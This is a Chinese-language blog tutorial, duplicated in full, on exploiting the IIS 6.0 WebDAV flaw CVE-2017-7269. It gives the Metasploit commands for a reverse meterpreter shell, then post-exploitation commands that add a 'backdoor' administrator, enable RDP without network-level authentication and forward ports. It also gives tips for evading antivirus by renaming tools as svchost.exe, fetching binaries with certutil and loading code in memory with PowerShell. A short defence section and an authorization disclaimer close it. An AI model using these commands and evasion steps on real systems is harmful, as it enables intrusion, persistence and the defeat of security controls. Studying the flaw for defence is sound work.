1. 漏洞背景与原理剖析第一次听说CVE-2017-7269这个漏洞时我正在给客户做安全巡检。这个存在于古老IIS6.0中的远程代码执行漏洞直到2017年才被公开着实让我惊讶。简单来说当IIS6.0开启WebDAV扩展时攻击者可以通过精心构造的PROPFIND请求触发缓冲区溢出最终实现任意代码执行。这个漏洞的特殊之处在于它的触发条件。WebDAV本身是HTTP协议的扩展用于实现远程文件管理很多企业内网的文件共享服务都会启用它。我在实际测试中发现即使服务器没有显式配置WebDAV功能只要安装了相关组件攻击面就依然存在。漏洞原理涉及ScStoragePathFromUrl函数对超长URL的处理缺陷。当请求头中的Host:字段超过特定长度时就会发生栈溢出。有趣的是这个漏洞的利用需要精确控制溢出内容我在实验室复现时前三次都因为偏移量计算错误导致exploit失败。2. 实验环境搭建指南搭建测试环境是复现漏洞的第一步这里我推荐使用Windows Server 2003 R2 SP2中文版。记得我第一次尝试时用了英文版系统结果exp怎么都触发不了后来才发现是语言包导致的地址偏移差异。具体搭建步骤安装系统后通过添加/删除Windows组件启用IIS服务在IIS管理器中右键网站属性进入Web服务扩展将WebDAV状态改为允许并勾选所有未知CGI扩展有个容易踩的坑是很多教程会告诉你直接启用WebDAV就行但实际上还需要在网站主目录的写入权限打勾。我曾在客户现场遇到这个情况明明配置正确却无法触发漏洞折腾半天才发现是权限问题。测试环境建议关闭Windows防火墙或者手动开放80端口。如果要在虚拟机上实验记得把网络适配器设为桥接模式否则可能遇到奇怪的网络问题。我用的VMware Workstation 15配合Kali 2023作为攻击机。3. 漏洞复现详细步骤现在来到最关键的实战环节。首先我们需要准备exploit工具github上zcgonvh的版本是目前最稳定的。不过要注意下载后需要重命名文件把横杠改为下划线否则Metasploit无法识别。这个细节很多教程都没提我当初就卡在这里半小时。完整操作流程# 将exp复制到msf模块目录 cp cve_2017_7269.rb /usr/share/metasploit-framework/modules/exploits/windows/iis/ # 启动msfconsole后执行 reload_all use exploit/windows/iis/cve_2017_7269 set RHOSTS 192.168.1.100 set RPORT 80 set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.101 exploit成功获取shell后别急着庆祝默认获得的只是web服务账号权限。这时候需要上传提权工具我比较推荐iis6.exe体积小成功率高。上传前记得用cd命令找个有写权限的目录比如/Temp或者网站的上传文件夹。有个实用技巧如果遇到杀软拦截可以尝试将iis6.exe改名为svchost.exe之类的系统文件名。我在某次渗透测试中就这样绕过了一款企业级防护软件。4. 权限提升实战技巧拿到普通shell只是开始真正的挑战是提权。我总结了几种可靠的方法第一种是通过iis6.exe直接执行系统命令iis6.exe net user backdoor Pssw0rd /add iis6.exe net localgroup administrators backdoor /add第二种是开启远程桌面。上传我修改过的3389.bat脚本这个版本会同时关闭网络级身份验证iis6.exe 3389.bat不过要注意现代Windows系统默认防火墙会拦截RDP连接。我通常会用以下命令临时放行iis6.exe netsh firewall set portopening TCP 3389 enable如果遇到更严格的环境建议使用端口转发到其他开放端口。比如将3389转发到80端口iis6.exe netsh interface portproxy add v4tov4 listenport80 connectport33895. 常见问题与解决方案在复现过程中我遇到过各种奇葩问题。最常见的是exp执行后没有返回shell这通常有三个原因目标系统补丁未卸载KB4012598补丁修复了这个漏洞测试前需要卸载网络连接问题建议先用nc测试端口连通性Payload不匹配32位系统要用x86的payload64位要用x64的另一个高频问题是提权工具被杀。我的解决方案是使用免杀版本工具直接通过certutil下载远程二进制文件用powershell内存加载恶意代码有次在客户内网遇到更棘手的情况所有exe文件都被限制执行。最后我用msf的migrate功能注入到系统进程才突破限制这个技巧在严格环境中特别有用。6. 防护与修复建议作为安全从业者我们不仅要会攻击更要懂防御。对于这个漏洞最彻底的解决方案是升级到新版IIS。如果必须使用IIS6.0我有以下建议禁用WebDAV扩展配置URLScan工具过滤异常请求设置应用程序池使用低权限账户启用Windows防火墙严格限制入站规则在企业环境中我还会建议部署WAF设备添加针对PROPFIND请求的特殊检测规则。同时要定期进行漏洞扫描早发现早处理。最后提醒一点本文所有技术细节仅限授权测试使用。我在给企业做安全服务时都会事先签订授权协议避免法律风险。安全研究要遵守道德底线这个原则比任何技术都重要。
IIS6.0 CVE-2017-7269漏洞实战:从环境搭建到权限提升全解析
1. 漏洞背景与原理剖析第一次听说CVE-2017-7269这个漏洞时我正在给客户做安全巡检。这个存在于古老IIS6.0中的远程代码执行漏洞直到2017年才被公开着实让我惊讶。简单来说当IIS6.0开启WebDAV扩展时攻击者可以通过精心构造的PROPFIND请求触发缓冲区溢出最终实现任意代码执行。这个漏洞的特殊之处在于它的触发条件。WebDAV本身是HTTP协议的扩展用于实现远程文件管理很多企业内网的文件共享服务都会启用它。我在实际测试中发现即使服务器没有显式配置WebDAV功能只要安装了相关组件攻击面就依然存在。漏洞原理涉及ScStoragePathFromUrl函数对超长URL的处理缺陷。当请求头中的Host:字段超过特定长度时就会发生栈溢出。有趣的是这个漏洞的利用需要精确控制溢出内容我在实验室复现时前三次都因为偏移量计算错误导致exploit失败。2. 实验环境搭建指南搭建测试环境是复现漏洞的第一步这里我推荐使用Windows Server 2003 R2 SP2中文版。记得我第一次尝试时用了英文版系统结果exp怎么都触发不了后来才发现是语言包导致的地址偏移差异。具体搭建步骤安装系统后通过添加/删除Windows组件启用IIS服务在IIS管理器中右键网站属性进入Web服务扩展将WebDAV状态改为允许并勾选所有未知CGI扩展有个容易踩的坑是很多教程会告诉你直接启用WebDAV就行但实际上还需要在网站主目录的写入权限打勾。我曾在客户现场遇到这个情况明明配置正确却无法触发漏洞折腾半天才发现是权限问题。测试环境建议关闭Windows防火墙或者手动开放80端口。如果要在虚拟机上实验记得把网络适配器设为桥接模式否则可能遇到奇怪的网络问题。我用的VMware Workstation 15配合Kali 2023作为攻击机。3. 漏洞复现详细步骤现在来到最关键的实战环节。首先我们需要准备exploit工具github上zcgonvh的版本是目前最稳定的。不过要注意下载后需要重命名文件把横杠改为下划线否则Metasploit无法识别。这个细节很多教程都没提我当初就卡在这里半小时。完整操作流程# 将exp复制到msf模块目录 cp cve_2017_7269.rb /usr/share/metasploit-framework/modules/exploits/windows/iis/ # 启动msfconsole后执行 reload_all use exploit/windows/iis/cve_2017_7269 set RHOSTS 192.168.1.100 set RPORT 80 set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.101 exploit成功获取shell后别急着庆祝默认获得的只是web服务账号权限。这时候需要上传提权工具我比较推荐iis6.exe体积小成功率高。上传前记得用cd命令找个有写权限的目录比如/Temp或者网站的上传文件夹。有个实用技巧如果遇到杀软拦截可以尝试将iis6.exe改名为svchost.exe之类的系统文件名。我在某次渗透测试中就这样绕过了一款企业级防护软件。4. 权限提升实战技巧拿到普通shell只是开始真正的挑战是提权。我总结了几种可靠的方法第一种是通过iis6.exe直接执行系统命令iis6.exe net user backdoor Pssw0rd /add iis6.exe net localgroup administrators backdoor /add第二种是开启远程桌面。上传我修改过的3389.bat脚本这个版本会同时关闭网络级身份验证iis6.exe 3389.bat不过要注意现代Windows系统默认防火墙会拦截RDP连接。我通常会用以下命令临时放行iis6.exe netsh firewall set portopening TCP 3389 enable如果遇到更严格的环境建议使用端口转发到其他开放端口。比如将3389转发到80端口iis6.exe netsh interface portproxy add v4tov4 listenport80 connectport33895. 常见问题与解决方案在复现过程中我遇到过各种奇葩问题。最常见的是exp执行后没有返回shell这通常有三个原因目标系统补丁未卸载KB4012598补丁修复了这个漏洞测试前需要卸载网络连接问题建议先用nc测试端口连通性Payload不匹配32位系统要用x86的payload64位要用x64的另一个高频问题是提权工具被杀。我的解决方案是使用免杀版本工具直接通过certutil下载远程二进制文件用powershell内存加载恶意代码有次在客户内网遇到更棘手的情况所有exe文件都被限制执行。最后我用msf的migrate功能注入到系统进程才突破限制这个技巧在严格环境中特别有用。6. 防护与修复建议作为安全从业者我们不仅要会攻击更要懂防御。对于这个漏洞最彻底的解决方案是升级到新版IIS。如果必须使用IIS6.0我有以下建议禁用WebDAV扩展配置URLScan工具过滤异常请求设置应用程序池使用低权限账户启用Windows防火墙严格限制入站规则在企业环境中我还会建议部署WAF设备添加针对PROPFIND请求的特殊检测规则。同时要定期进行漏洞扫描早发现早处理。最后提醒一点本文所有技术细节仅限授权测试使用。我在给企业做安全服务时都会事先签订授权协议避免法律风险。安全研究要遵守道德底线这个原则比任何技术都重要。
